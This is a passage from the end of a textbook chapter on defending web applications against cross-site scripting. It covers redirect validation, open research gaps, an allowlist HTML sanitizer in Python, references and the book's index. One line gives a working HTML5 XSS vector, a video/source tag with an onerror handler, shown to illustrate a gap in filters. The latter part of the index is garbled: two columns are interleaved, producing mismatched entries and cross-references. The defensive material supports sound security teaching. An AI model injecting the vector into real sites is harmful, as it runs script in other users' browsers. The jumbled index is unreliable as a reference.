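        print(candidate, "->", safe_redirect_target(candidate, allowed))
```

same_origin() treats https://app.example.com and https://app.example.com:443 as identical because the default port is filled in, while a differing scheme, host or explicit port makes two URLs different origins. safe_redirect_target() accepts only site-relative paths and listed origins, so a scheme-relative //host/ or a javascript: target falls back to the home page.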

6.4 OPEN RESEARCH DIRECTIONS
A number of studies have been discussed while formulating this classification of the existing XSS defensive work. There are some research gaps present in the currently existing solutions. These are discussed below:

• Less Attention toward New Types of XSS Attack: Most of the existing state-of-the-art XSS defensive techniques provide protection against traditional types of XSS attacks, i.e. stored and reflected XSS. There exist no robust solutions that can effectively protect against the new types of XSS attack, i.e. DOM-based and mutation-based XSS attacks. Therefore, it is the need of the hour to design techniques that can effectively defend against them.
• Inappropriate Differentiation: Web applications are developed using dynamic programming concepts and rich high-level languages like JavaScript. Therefore, browsers simply cannot block JavaScript code for defending against an XSS attack. They have to allow the JavaScript code permitted by the web application developer. To achieve this, some techniques have been developed to differentiate between benign and malicious JavaScript code. However, the attacker uses obfuscation approaches to inject malicious JavaScript code into web applications. Consequently, it has become a tedious task to differentiate benign and malicious code. Therefore, researchers must incorporate techniques that can accurately differentiate between benign and malicious code.
• Improper Handling of Partial Script Injection: In order to exploit XSS vulnerabilities, the attacker simply injects malicious JavaScript code into web applications. However, the techniques designed to identify this JavaScript code use string matching algorithms that perform exact matching. Therefore, the attacker exploits the partial script injection approach to inject malicious scripts. Nevertheless, only a few techniques exist that can identify partial script injection (modification of a benign script) to detect an XSS attack. Thus, techniques must incorporate mechanisms to perform partial script injection detection to mitigate the XSS attack completely.
• Inappropriate Context Determination: The existing literature has introduced some XSS defensive mechanisms that perform context-sensitive sanitization on the untrusted/malicious variables of the JavaScript code. Such techniques determine the context of unsafe JavaScript/HTML variables and accordingly perform sanitization on them. However, this sort of sanitization is no longer effective, as it does not determine the nested context of such untrusted variables. Therefore, most of the inner/nested contexts of such variables remain uncovered by the sanitization routines, which leads to the exploitation of XSS worms. An XSS defensive technique must incorporate a mechanism for determining the nested context of such malicious variables and must perform accurate placement of sanitization routines in such contexts.
• Incompetent Sanitization Support for New HTML5 Features: In the contemporary era of the World Wide Web (WWW), HTML5 is being utilized as an emerging platform for the development of modern web applications. The key advantage of adopting it is that it can be easily integrated across the other platforms of the web browsers. However, it introduces some new tags and attributes (such as <video>, <source>, <autofocus>, etc.) which can be utilized for creating new XSS attack vectors.

<video><source onerror="alert(1)"></video>

Modern web browsers and the existing XSS filters do not check for this HTML5 attack vector. A simple pop-up window will appear with the message "1" on the screen. Therefore, a robust XSS defensive solution is the need of the hour that will detect and introduce an effective mechanism of sanitizing/filtering HTML5 XSS attack vectors.
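A minimal allowlist sanitizer of the kind Section 6.2.3 describes, which also shows how the HTML5 vector above is neutralized: any tag or attribute not on the allowlist is dropped, so <video>, <source> and every on* handler never reach the page. This is an added example built on Python's html.parser, not code from the book or from any of the libraries it names; the allowlist and the sample inputs are constructed.

```python
from html import escape
from html.parser import HTMLParser

# Constructed allowlist: what a comment field on a site is allowed to keep.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href"}}          # no on* handlers, no style, no src
SAFE_HREF_PREFIXES = ("http://", "https://")
DROP_WITH_CONTENT = {"script", "style"}  # drop the element and its text
VOID_TAGS = {"br"}


class AllowlistSanitizer(HTMLParser):
    """Rebuilds the input from allowlisted tags/attributes only; everything
    else is removed, so the output is authored HTML of a known shape."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []   # allowlisted tags currently open, for balancing
        self.skip_depth = 0   # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return  # unknown tag (video, source, img, ...) dropped; its text survives
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # event handlers and other attributes never pass
            value = value or ""
            if name == "href" and not value.lower().startswith(SAFE_HREF_PREFIXES):
                continue  # only http(s) links are kept
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth -= 1
            return
        if tag in self.open_tags:
            # close everything opened after it so the output stays well-formed
            while self.open_tags:
                closed = self.open_tags.pop()
                self.out.append(f"</{closed}>")
                if closed == tag:
                    break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))  # text is re-escaped

    def result(self) -> str:
        while self.open_tags:
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize(untrusted_html: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(untrusted_html)
    parser.close()
    return parser.result()


if __name__ == "__main__":
    # Constructed inputs: a normal comment and the HTML5 vector from the text.
    print(sanitize('<p>Hello <b>world</b></p>'))
    print(repr(sanitize('<video><source onerror="alert(1)"></video>')))
```

Allowlisting is what makes this robust against new tags: the sanitizer never has to know that <source onerror> exists, because nothing it has not been told to keep survives. It also re-escapes text and balances tags so the output is well-formed, which matters when the result is inserted into a page alongside other content.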

6.5 CHAPTER SUMMARY
In this chapter, we attempted to present the layers of security that can be applied to prevent the XSS attack. Nevertheless, individually, each technique is less effective. To remain more attentive and careful while detecting XSS, there is a requirement to integrate multiple techniques like secure coding, static and dynamic testing of the web applications, proper filtering and sanitization schemes, etc. Additionally, we discussed the browser's security tips and general practices, followed by some open research directions to continue in the direction of designing an innovative and effective approach.

REFERENCES
1. Content Security Policy. [online] Available at: https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP.
2. Gupta, B. B. (ed.). (2018). Computer and Cyber Security: Principles, Algorithm, Applications, and Perspectives. CRC Press.
3. Gupta, B. B., Gupta, S., & Chaudhary, P. (2017). Enhancing the browser-side context-aware sanitization of suspicious HTML5 code for halting the DOM-based XSS vulnerabilities in cloud. International Journal of Cloud Applications and Computing, 7(1), 1–31.
4. Gupta, B. B., & Sheng, Q. Z. (eds.). (2019). Machine Learning for Computer and Cyber Security: Principle, Algorithms, and Practices. CRC Press.
5. Gupta, S., & Gupta, B. B. (2015). BDS: Browser dependent XSS sanitizer. In Handbook of Research on Securing Cloud-Based Databases with Biometric Applications (pp. 174–191). IGI Global.
6. Gupta, S., & Gupta, B. B. (2016). JS-SAN: Defense mechanism for HTML5-based web applications against JavaScript code injection vulnerabilities. Security and Communication Networks, 9(11), 1477–1495.
7. Gupta, S., Gupta, B. B., & Chaudhary, P. (2018). A client-server JavaScript code rewriting-based framework to detect the XSS worms from online social network. Concurrency and Computation: Practice and Experience, 31(21), e4646.
8. Jiang, F., Fu, Y., Gupta, B. B., Lou, F., Rho, S., Meng, F., & Tian, Z. (2018). Deep learning based multi-channel intelligent attack detection for data security. IEEE Transactions on Sustainable Computing.
9. Sarmah, U., Bhattacharyya, D. K., & Kalita, J. K. (2018). A survey of detection methods for XSS attacks. Journal of Network and Computer Applications, 118, 113–143.
10. Seth, F., Jeremiah, G., Robert, H., Anton, R., & Petko, D. P. (2011). XSS Attacks: Cross Site Scripting Exploits and Defense. Elsevier.
11. Stergiou, C., Psannis, K. E., Xifilidis, T., Plageras, A. P., & Gupta, B. B. (2018, April). Security and privacy of big data for social networking services in cloud. In IEEE INFOCOM 2018 - IEEE Conference on Computer Communications Workshops (INFOCOM WKSHPS) (pp. 438–443). IEEE.
12. Taha, T. A., & Karabatak, M. (2018, March). A proposed approach for preventing cross-site scripting. In 2018 6th International Symposium on Digital Forensic and Security (ISDFS) (pp. 1–4). IEEE.
13. WhiteHat Security report. [online] Available at: https://info.whitehatsec.com/rs/675-YBI-674/images/WHS%202017%20Application%20Security%20Report%20FINAL.pdf.
14. XSS filter evasion cheat sheet. [online] Available at: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet.
15. XSS prevention cheat sheet. [online] Available at: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html.
Index

Access control list (ACL), 77, 85
Account hijacking, 58
ACL, see Access control list
Action Authenticator, 85
Advanced authentication methods, 46
Alternate hypothesis, 100
Application logic/information, 3
APR, see Automated Pre-processing Required
Architectural conflicts, 45
ASP.NET, 4–5
Attribute value escaping, 129
Automated Pre-processing Required (APR), 103
Availability, of information, 43
AVG PrivacyFix, 47

Back-end data store, 3
Broken access control, 16
Broken authentication, 16
Browser exploitation, 58
Browser's security, practices for, 131–134
Burp Scanner, 120

CAS, see Context-Aware Sanitization
Category of XSS attack Detected (COXD), 103
CIA, see Confidentiality, integrity, and availability
Clickjacking, 38
Client-server architecture, 42
Client-server side defensive approaches, 61, 66–68
Client-side defensive approaches, 61–63, 66
Clustered Scripts Template Generator, 86–88
Clustered template generation algorithm, 87
Clustering, 82
Clustering-based context-sensitive sanitization, 78, 81–82
Confidentiality, integrity, and availability (CIA), 42–43
Content Security Policy (CSP), 130–131
Context-Aware Sanitization (CAS), 103
Context-based sanitization, 77–78
  abstract design, 78–80
  algorithm of, 90
  detailed design, 79–81
    recognition phase, 80–83
    training phase, 80
  experimental testing and evaluation results, 89
    detection outcome, 91, 95–97
    implementation details, 92
    testing platforms, 92
    XSS attack vectors, categories of, 92–95
  modules
    Action Authenticator, 85
    Clustered Scripts Template Generator, 86–88
    Context-Based Sanitizer, 88–89
    HTML Content Separator, 85
    HTML Parser, 84–85
    Injection Point Identifier, 84
    Script Extractor, 85–86
    Session Supervisor, 84
    URL Synchronizer, 84
    View Manager, 84
  vs. other works, 103, 104
Context-Based Sanitizer, 88–89
Context determination, 135
Cookie information, 133
Cookie stealing, 58
Corporate espionage, 42
COXD, see Category of XSS attack Detected
Cross-site scripting (XSS) attack, 17, 39
  browser's security, practices for, 131–134
  classification
    DOM-based XSS attack, 60, 61
    non-persistent XSS attack, 59, 60
    persistent XSS attack, 57, 59
  code injection attack, 53
  defensive approaches, 60–61
    access control list (ACL), 77
    client-server side approaches, 61, 66–68
    client-side approaches, 61–63, 66
    context-based sanitization (see Context-based sanitization)
    proxy-based approaches, 61, 66, 69–70
    server-side approaches, 61, 64–66
    views of, 76–77
  effects of, 55, 57, 58
  examination steps, 54–55
  identification and mitigation, 9
  open research directions, 134–136
  origin of, 54
  performance analysis
    comparative analysis, 103, 104
    F-Measure, 97–99
    F-test hypothesis, 99–103
  prevention schemes
    Content Security Policy (CSP), 130–131
    data validation, 131
    escaping/encoding, 128–130
    filtering, 128
    sanitization, 130
  recent incidences of, 55–57
  vectors
    categories of, 92–95
    statistics of, 100–102
  vulnerability proliferation, 126, 127
CSP, see Content Security Policy
CSS escaping, 129
Cyber bullying, 42
Cyber stalking, 41

Data validation, 131
De-anonymization, 39
Defensio, 47
Denial of Service Attack, 58
Deserialization, 17
Detection of Malicious JavaScript Functions (DMJSF), 103
Distance-based clustering algorithm, 86, 92
DMJSF, see Detection of Malicious JavaScript Functions
Document Object Model (DOM), 84
Domain-centric web application vulnerabilities, 11–14
DOM-based XSS attack, 60, 61
Dynamic testing, of web application vulnerabilities, 8–10

Embedded protection techniques, 46
Escaping/encoding, 128–130
Exponential XSS worm, 115

Filtering, 128
F-Measure, 97–99
F-test hypothesis, 99–103

HTML5 attack vectors, 135–136
htmLawed, 119
HTML Content Separator, 85
HTML entity escaping, 129
HTML Parser, 84–85
HTML Purifier, 118
Hydra XSS worm, 117

Identity clone attack, 39
ILI, see Inclusion of Legitimate Inputs
ImmuniWeb On-demand, 120
Inclusion of Legitimate Inputs (ILI), 103
Inference attack, 39
Information leakage, 40
Injection attack, 16
Injection Point Identifier, 84
Insecure deserialization, 17, 22
Insufficient logging and monitoring, 17
Integrity, of social media, 43

JavaScript escaping, 129

Linear XSS worm, 117
Location leakage, 40
LogDog security, 47

Malware, 38
McAfee Social Protection, 48
Minor Monitor, 47
Misinformation, 58
MyPermissions Social Media Privacy Protection, 48

Net Nanny, 48
Netsparker, 120
Network security solutions, 46
Non-persistent XSS attack, 59, 60
Norton Safe Web, 48
NoScript Security Suite, 47
Notification to user, 46
Null hypothesis, 99

Online exploitation, 41
Online Social Networking (OSN), 29
  characteristics of, 31, 33
  social media attacks
    distinct attack classes, 35, 37–42
    prevention solutions, 45–48
    social network design vs. privacy and security goals, 37, 42–45
  statistics of
    active internet users, 30, 31
    number of users, 31, 32
    percentage of users by age group, 31, 32
  prominent services of, 30
  vulnerabilities incidences
    on Instagram, 35
    malware families, 35, 36
    total number of vulnerabilities, 33
    on Twitter platform, 34
Open Web Application Security Project (OWASP), 10, 11
OSN, see Online Social Networking

Replication, XSS worms stage, 113–114
Reproduction, XSS worms stage, 114
OWASP, see Open Web Application Risk path assessment, 15, 18
Security Project Risk rating methods, mapping
OWASP Antisamy, 118 vulnerabilities with, 18–23
OWASP HTML Sanitizer, 118
OWASP Xenotix XSS Exploit Same Origin Policy (SOP), 132–133
Framework, 118 Samy worm, 111–113
OWASP Zed Attack Proxy (ZAP), 119 Sandboxed environment, 133
Sanitization, 77, 88, 130; see also
P2P architecture, see Peer-to-peer Context-based sanitization
architecture SCMech, see Scrutinizing
Partial script injection, 134–135 Mechanism
Peer-to-peer (P2P) architecture, 42, 45 SCMod, see Source Code
Persistent XSS attack, 57, 59 Modifcation
Phishing, 38, 58 SCMon, see Source Code Monitoring
PHP, 4–6 Script Extractor, 85–86
Power fuzzer, 120 Scrutinizing Mechanism
Privacy, of social users, 43 (SCMech), 103
vs. data mining, 44 Security misconfguration, 17
vs. enhanced searching Sensitive data exposure, 16
capabilities, 44 Server-side defensive approaches, 61,
vs. social connection, 44 64–66
Privacy Badger, 47 Session Supervisor, 84
Privacy breach through tagging, 41 Social bots, 39
Privacy Scanner for Facebook, 48 Social Media Attacks
Privacy settings classes of, 35, 37
enhanced security and, 46 description of, 35, 37–42
improved user interfaces for, 46 Socware, 40
Privileges capturing, XSS worms SOP, see Same Origin Policy
stage, 113, 114 Source Code Modifcation
Probely, 120 (SCMod), 103
Programming languages, web Source Code Monitoring
application using, 4–5 (SCMon), 103
Proxy-based defensive approaches, Spamming, 38
61, 66, 69–70 Spear phishing, 40
Static testing, of web application
Refected XSS attack, see Non- vulnerabilities, 8–10
persistent XSS attack Stored XSS attack, see Persistent XSS
Remote control on system, 58 attack
Index    ◾   143

Subgraph Vega Vulnerability SAST vs. DAST, 10


Scanner, 118 security assessment, 6
Sybil attack, 40 severity level, 3–6
static testing, 8–10
Treats from multimedia data, 41 top 10 vulnerabilities, 10, 11,
13–17
uBlock Origin, 47 XSS identifcation and
URL escaping, 129 mitigation, 9
URL Synchronizer, 84 Web browser, 3
WebScarab, 119
View Manager, 84 Web server, 2
Vulnerability abuse, XSS worms
stage, 113, 114 XDP, see XSS attack Detection
Profciency
W3af, 119 XML External Entities (XXE), 16
Web application architecture, 2–3 XSS attack, see Cross-site scripting
Web application vulnerabilities attack
average number of attacks, 13, 14 XSS attack Detection Profciency
consequences of attacks on users, (XDP), 103
13, 14 XSSer, 119
description of, 15–17 XSS Flash worm, 115–116
developing secure web XSS worms
applications classifcation
empowering application exponential XSS worm, 115
developers, 23–24 linear XSS worm, 117
risk identifcation and XSS Flash worm, 115–116
management, 19 handling tools, 117–120
secure patch release assurance, life cycle of, 113–114
19, 23 real-world incidences of, 110–111
in developing technologies, 6, 7 Samy worm, case study of,
domain-centric, 11–14 111–113
dynamic testing, 8–10 stages of, 110
evaluation against risk factors, XXE, see XML External Entities
19, 24
mapping with risk rating ZAP, see OWASP Zed Attack Proxy
methods, 18–23 ZoneAlarm Anti-phishing Chrome
overview, 15 Extension, 47
risk path assessment, 15, 16, 18 ZoneAlarm identity protection, 48